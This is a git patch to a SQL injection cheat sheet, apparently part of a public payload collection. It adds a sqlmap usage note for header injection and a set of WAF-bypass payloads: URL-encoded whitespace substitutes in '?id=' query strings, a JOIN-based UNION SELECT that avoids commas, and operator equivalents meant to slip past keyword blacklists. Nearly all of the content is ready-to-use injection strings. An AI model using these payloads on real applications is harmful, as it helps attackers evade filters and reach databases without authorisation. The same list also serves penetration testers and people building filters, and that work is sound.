From a39a10f175ccb7f66490db5ea3044379f31ebd22 Mon Sep 17 00:00:00 2001 From: swisskyrepo Date: Sun, 4 Dec 2016 20:26:42 +0700 Subject: [PATCH] SQL injection - added some bypass --- SQL injection/README.md | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/SQL injection/README.md b/SQL injection/README.md index 11bae55..6a9241e 100644 --- a/SQL injection/README.md +++ b/SQL injection/README.md @@ -33,6 +33,7 @@ sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --risk=3 --lev Custom injection in UserAgent/Header/Referer/Cookie ``` python sqlmap.py -u "http://example.com" --data "username=admin&password=pass" --headers="x-forwarded-for:127.0.0.1*" +The injection is located at the '*' ``` General tamper option and tamper's list @@ -176,6 +177,16 @@ SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/ ## WAF Bypass +No Space (%20) - bypass using whitespace alternatives +``` +?id=1%09and%091=1%09-- +?id=1%0Dand%0D1=1%0D-- +?id=1%0Cand%0C1=1%0C-- +?id=1%0Band%0B1=1%0B-- +?id=1%0Aand%0A1=1%0A-- +?id=1%A0and%A01=1%A0-- +``` + No Whitespace - bypass using comments ``` ?id=1/*comment*/and/**/1=1/**/-- @@ -186,10 +197,11 @@ No Whitespace - bypass using parenthesis ?id=(1)and(1)=(1)-- ``` -No Comma - bypass using OFFSET and FROM +No Comma - bypass using OFFSET, FROM and JOIN ``` -LIMIT 0,1 -> LIMIT 1 OFFSET 0 +LIMIT 0,1 -> LIMIT 1 OFFSET 0 SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1). +SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d ``` Blacklist using keywords - bypass using uppercase/lowercase @@ -199,11 +211,12 @@ Blacklist using keywords - bypass using uppercase/lowercase ?id=1 aNd 1=1# ``` -Blacklist using keywords case insensitive - bypass using equivalent +Blacklist using keywords case insensitive - bypass using an equivalent operator ``` AND -> && OR -> || = -> LIKE,REGEXP, not < and not > +> X -> not between 0 and X WHERE -> HAVING ```